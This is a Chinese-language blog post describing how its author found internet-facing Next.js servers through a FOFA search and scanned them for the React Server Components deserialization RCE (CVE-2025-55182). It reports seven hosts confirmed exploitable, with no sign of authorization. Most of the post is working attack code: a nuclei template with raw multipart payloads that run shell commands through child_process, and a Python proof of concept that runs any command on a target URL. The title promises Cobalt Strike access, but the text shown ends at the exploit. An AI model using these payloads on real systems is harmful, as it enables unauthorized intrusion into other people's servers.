当前位置：首页>Linux>从CVE-2025-55182到linux上线CS

从CVE-2025-55182到linux上线CS

2026-02-05 04:13:19

主包也是放假回家了，在家无聊就随便逛逛微信公众号，也是无意间看到cve-2025-55182的fofa指纹，就上线操作简单玩一下，给大家分享一下，也当作是个简单的记录。

由于cve-2025-55182之前在微信公众号刷屏，主包也是简单了解过了，也在github找到了相关poc，信息收集过程如下：

1：fofa指纹直接搜索：app="Next.js" && body="/_next/static/chunks/app/"，也是搜出一大堆，简单下载九百多条数据，使用cve-2025-55182的nuclei的yaml模板扫描(出自“狐狸说安全”)，扫出十个目标。

id: CVE-2025-55182info:  name: React Server Components - Remote Code Execution  author: DhiyaneshDk,princechaddha,assetnote,lachlan2k,maple3142,iamnooob  severity: critical  description: |    React Server Components 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including react-server-dom-parcel,    react-server-dom-turbopack, and react-server-dom-webpack contain a remote code execution caused    by unsafe deserialization of payloads from HTTP requests to Server Function endpoints, letting    unauthenticated attackers execute arbitrary code remotely, exploit requires no authentication.  impact: |    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.  remediation: |    Update to the latest version that fixes the unsafe deserialization issue.  reference:    - https://github.com/assetnote/react2shell-scanner    - https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3    - https://www.facebook.com/security/advisories/cve-2025-55182    - http://www.openwall.com/lists/oss-security/2025/12/03/4    - https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components    - https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp    - https://vercel.com/changelog/cve-2025-55182  metadata:    verified: true    max-request: 1    shodan-query: http.component:"Next.js"  tags: cve,cve2025,react,rce,nextjs,oastvariables:  request-id: "{{to_lower(rand_text_alphanumeric(8))}}"  nextjs-html: "{{rand_text_alphanumeric(21)}}"  num1: "{{rand_int(40000, 44800)}}"  num2: "{{rand_int(40000, 44800)}}"  result: "{{to_number(num1)*to_number(num2)}}"http:  - raw:      - |        @timeout 15s        POST / HTTP/1.1        Host: {{Hostname}}        Next-Action: x        X-Nextjs-Request-Id: {{request-id}}        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad        X-Nextjs-Html-Request-Id: {{nextjs-html}}        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="0"        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $(({{num1}}*{{num2}}))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="1"        "$@0"        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="2"        []        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--      - |        @timeout 15s        POST / HTTP/1.1        Host: {{Hostname}}        Next-Action: x        X-Nextjs-Request-Id: {{request-id}}        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad        X-Nextjs-Html-Request-Id: {{nextjs-html}}        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="0"        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"{{num1}}*{{num2}}\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="1"        "$@0"        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad        Content-Disposition: form-data; name="2"        []        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--    stop-at-first-match: true    matchers:      - type: dsl        dsl:          - "contains(to_lower(header), 'x-action-redirect: /login?a={{result}}')"# digest: 4a0a00473045022100802218ca96214cd6fc070c8199a03abe8f4a17f90b9ffd4b8235b7f873f5f7f90220061a63d9312487ed27c3351e98d04526e8bdfcd0f1c4dd7d2871299c46e5471f:922c64590222798bb761d5b6d8e72950

2：经过手工poc验证之后，确认存在该漏洞的有七个目标。poc如下(来自github仓库https://github.com/msanft/CVE-2025-55182)，poc如下，食用只需修改BASE_URL(或者加参数1)和EXECUTABLE(或加参数2)(需要执行的命令)即可。

# /// script# dependencies = ["requests"]# ///import requestsimport sysimport jsonBASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://x.x.x.x:x"EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"crafted_chunk = {    "then": "$1:__proto__:then",    "status": "resolved_model",    "reason": -1,    "value": '{"then": "$B0"}',    "_response": {        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",        # If you don't need the command output, you can use this line instead:        # "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",        "_formData": {            "get": "$1:constructor:constructor",        },    },}files = {    "0": (None, json.dumps(crafted_chunk)),    "1": (None, '"$@0"'),}headers = {"Next-Action": "x"}res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)print(res.status_code)print(res.text)